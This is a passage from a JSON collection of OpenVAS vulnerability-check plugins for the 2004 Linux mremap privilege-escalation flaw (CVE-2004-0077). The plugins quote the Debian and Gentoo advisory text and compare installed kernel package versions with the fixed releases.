missing an update to kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus\nannounced via advisory DSA 466-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53163", "href": "http://plugins.openvas.org/nasl.php?oid=53163", 
"type": "openvas", "title": "Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_466_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 466-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.2.10-13woody1 of 2.2 kernel images for the powerpc/apus\narchitecture and in version 2.2.10-2 of Linux 2.2.10 source.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the 2.4.20 kernel-image package for powerpc/apus. The old 2.2.10\nkernel image will be removed from Debian unstable.\n\nYou are strongly advised to switch to the fixed 2.4.17 kernel-image\npackage for powerpc/apus from woody until the 2.4.20 kernel-image\npackage is fixed in the unstable distribution.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus\nannounced via advisory DSA 466-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20466-1\";\n\nif(description)\n{\n script_id(53163);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.10\", ver:\"2.2.10-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.10\", ver:\"2.2.10-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.10-apus\", ver:\"2.2.10-13woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.10-apus\", ver:\"2.2.10-13woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200403-02.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54527", "href": "http://plugins.openvas.org/nasl.php?oid=54527", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200403-02 (Kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A critical security vulnerability has been found in recent Linux kernels by\nPaul Starzetz of iSEC Security Research which allows for local privilege\nescalations.\";\ntag_solution = \"Users are encouraged to upgrade to the latest available sources for their\nsystem:\n\n # emerge sync\n # emerge -pv your-favourite-sources\n # emerge your-favourite-sources\n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would do normally.\n \n # # IF YOUR KERNEL IS MARKED as 'remerge required!' 
THEN\n # # YOU SHOULD UPDATE YOUR KERNEL EVEN IF PORTAGE\n # # REPORTS THAT THE SAME VERSION IS INSTALLED.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200403-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=42024\nhttp://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200403-02.\";\n\n \n\nif(description)\n{\n script_id(54527);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200403-02 (Kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-kernel/aa-sources\", unaffected: make_list(\"ge 2.4.23-r1\"), vulnerable: make_list(\"lt 2.4.23-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/alpha-sources\", unaffected: make_list(\"ge 2.4.21-r4\"), vulnerable: make_list(\"lt 2.4.21-r4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ck-sources\", 
unaffected: make_list(\"eq 2.4.24-r1\", \"ge 2.6.2-r1\"), vulnerable: make_list(\"lt 2.6.2-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/compaq-sources\", unaffected: make_list(\"ge 2.4.9.32.7-r2\"), vulnerable: make_list(\"lt 2.4.9.32.7-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/development-sources\", unaffected: make_list(\"ge 2.6.3_rc1\"), vulnerable: make_list(\"lt 2.6.3_rc1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gaming-sources\", unaffected: make_list(\"ge 2.4.20-r8\"), vulnerable: make_list(\"lt 2.4.20-r8\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gentoo-dev-sources\", unaffected: make_list(\"ge 2.6.3_rc1\"), vulnerable: make_list(\"lt 2.6.3_rc1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gentoo-sources\", unaffected: make_list(\"eq 2.4.19-r11\", \"eq 2.4.20-r12\", \"ge 2.4.22-r7\"), vulnerable: make_list(\"lt 2.4.22-r7\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/grsec-sources\", unaffected: make_list(\"ge 2.4.24.1.9.13-r1\"), vulnerable: make_list(\"lt 2.4.24.1.9.13-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gs-sources\", unaffected: make_list(\"ge 2.4.25_pre7-r2\"), vulnerable: make_list(\"lt 2.4.25_pre7-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/hardened-sources\", unaffected: make_list(\"ge 2.4.24-r1\"), vulnerable: make_list(\"lt 2.4.24-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/hppa-dev-sources\", unaffected: make_list(\"ge 2.6.2_p3-r1\"), vulnerable: make_list(\"lt 2.6.2_p3-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/hppa-sources\", unaffected: make_list(\"ge 2.4.24_p0-r1\"), vulnerable: make_list(\"lt 2.4.24_p0-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ia64-sources\", unaffected: 
make_list(\"ge 2.4.24-r1\"), vulnerable: make_list(\"lt 2.4.24-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/mips-prepatch-sources\", unaffected: make_list(\"ge 2.4.25_pre6-r1\"), vulnerable: make_list(\"lt 2.4.25_pre6-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/mips-sources\", unaffected: make_list(\"ge 2.4.25_rc4\"), vulnerable: make_list(\"lt 2.4.25_rc4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/mm-sources\", unaffected: make_list(\"ge 2.6.3_rc1-r1\"), vulnerable: make_list(\"lt 2.6.3_rc1-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/openmosix-sources\", unaffected: make_list(\"ge 2.4.22-r4\"), vulnerable: make_list(\"lt 2.4.22-r4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/pac-sources\", unaffected: make_list(\"ge 2.4.23-r3\"), vulnerable: make_list(\"lt 2.4.23-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/planet-ccrma-sources\", unaffected: make_list(\"ge 2.4.21-r5\"), vulnerable: make_list(\"lt 2.4.21-r5\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-development-sources\", unaffected: make_list(\"ge 2.6.3_rc1-r1\"), vulnerable: make_list(\"lt 2.6.3_rc1-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources\", unaffected: make_list(\"ge 2.4.24-r1\"), vulnerable: make_list(\"lt 2.4.24-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources-benh\", unaffected: make_list(\"ge 2.4.22-r5\"), vulnerable: make_list(\"lt 2.4.22-r5\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources-crypto\", unaffected: make_list(\"ge 2.4.20-r3\"), vulnerable: make_list(\"lt 2.4.20-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources-dev\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != 
NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/selinux-sources\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/sparc-dev-sources\", unaffected: make_list(\"ge 2.6.3_rc1\"), vulnerable: make_list(\"lt 2.6.3_rc1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/sparc-sources\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/usermode-sources\", unaffected: make_list(\"rge 2.4.24-r1\", \"rge 2.4.26\", \"ge 2.6.3-r1\"), vulnerable: make_list(\"lt 2.6.3-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/vanilla-prepatch-sources\", unaffected: make_list(\"ge 2.4.25_rc4\"), vulnerable: make_list(\"lt 2.4.25_rc4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/vanilla-sources\", unaffected: make_list(\"ge 2.4.25\"), vulnerable: make_list(\"lt 2.4.25\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/win4lin-sources\", unaffected: make_list(\"eq 2.4.23-r2\", \"ge 2.6.2-r1\"), vulnerable: make_list(\"lt 2.6.2-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/wolk-sources\", unaffected: make_list(\"eq 4.9-r4\", \"ge 4.10_pre7-r3\"), vulnerable: make_list(\"lt 4.10_pre7-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/xfs-sources\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is 
missing an update to kernel-source-2.2.20,\nkernel-image-2.2.20-i386, kernel-image-2.2.20-reiserfs-i386,\nkernel-image-2.2.20-amiga, kernel-image-2.2.20-atari,\nkernel-image-2.2.20-bvme6000, kernel-image-2.2.20-mac,\nkernel-image-2.2.20-mvme147, kernel-image-2.2.20-mvme16x,\nkernel-patch-2.2.20-powerpc announced via advisory DSA 453-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53681", "href": "http://plugins.openvas.org/nasl.php?oid=53681", "type": "openvas", "title": "Debian Security Advisory DSA 453-1 (kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_453_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 453-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\nkernel-source-2.2.20 source 2.2.20-5woody3\nkernel-image-2.2.20-i386 i386 2.2.20-5woody5\nkernel-image-2.2.20-reiserfs-i386 i386 2.2.20-4woody1\nkernel-image-2.2.20-amiga m68k 2.20-4\nkernel-image-2.2.20-atari m68k 2.2.20-3\nkernel-image-2.2.20-bvme6000 m68k 2.2.20-3\nkernel-image-2.2.20-mac m68k 2.2.20-3\nkernel-image-2.2.20-mvme147 m68k 2.2.20-3\nkernel-image-2.2.20-mvme16x m68k 2.2.20-3\nkernel-patch-2.2.20-powerpc powerpc 2.2.20-3woody1\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.20,\nkernel-image-2.2.20-i386, kernel-image-2.2.20-reiserfs-i386,\nkernel-image-2.2.20-amiga, kernel-image-2.2.20-atari,\nkernel-image-2.2.20-bvme6000, kernel-image-2.2.20-mac,\nkernel-image-2.2.20-mvme147, kernel-image-2.2.20-mvme16x,\nkernel-patch-2.2.20-powerpc announced via advisory DSA 453-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20453-1\";\n\nif(description)\n{\n script_id(53681);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 
22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 453-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.2.20-powerpc\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-compact\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-idepci\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-compact\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) 
!= NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-idepci\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-reiserfs\", ver:\"2.2.20-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-reiserfs\", ver:\"2.2.20-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-amiga\", ver:\"2.2.20-4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-atari\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-bvme6000\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-mac\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-mvme147\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-mvme16x\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-chrp\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-pmac\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-prep\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.22, kernel-image-2.2.22-alpha\nannounced via 
advisory DSA 454-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53152", "href": "http://plugins.openvas.org/nasl.php?oid=53152", "type": "openvas", "title": "Debian Security Advisory DSA 454-1 (kernel-source-2.2.22, kernel-image-2.2.22-alpha)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_454_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 454-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\nkernel-source-2.2.22 source 2.2.22-1woody1\nkernel-image-2.2.22-alpha alpha 2.2.22-2\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.22, kernel-image-2.2.22-alpha\nannounced via advisory DSA 454-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20454-1\";\n\nif(description)\n{\n script_id(53152);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 454-1 (kernel-source-2.2.22, kernel-image-2.2.22-alpha)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.22\", ver:\"2.2.22-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.22\", ver:\"2.2.22-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.22\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-generic\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-jensen\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-nautilus\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-smp\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": 